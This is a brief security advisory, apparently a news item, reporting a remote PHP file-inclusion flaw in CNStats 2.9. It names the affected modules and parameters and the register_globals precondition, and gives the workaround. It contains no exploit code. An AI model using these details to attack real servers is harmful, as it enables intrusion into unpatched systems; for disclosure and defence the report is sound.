Web statistics software CNStats executes external code
Multiple bugs in CNStats, a web page access analysis application, allow attackers to execute their own PHP code on a server. This may permit access to the entire system. The who_r.php and who_s.php modules fail to filter the bj and bn parameters properly, allowing paths that include local or external PHP scripts can be entered. This does, however, require register_globals to be turned on, which is contrary to security recommendations. The bug was found in version 2.9. The current version 2.12 is apparently also affected. The only remedy at present is to turn off register_globals.
- CNStats 2.9 Remote File Include Vulnerability, bug report on Milw0rm
(mba)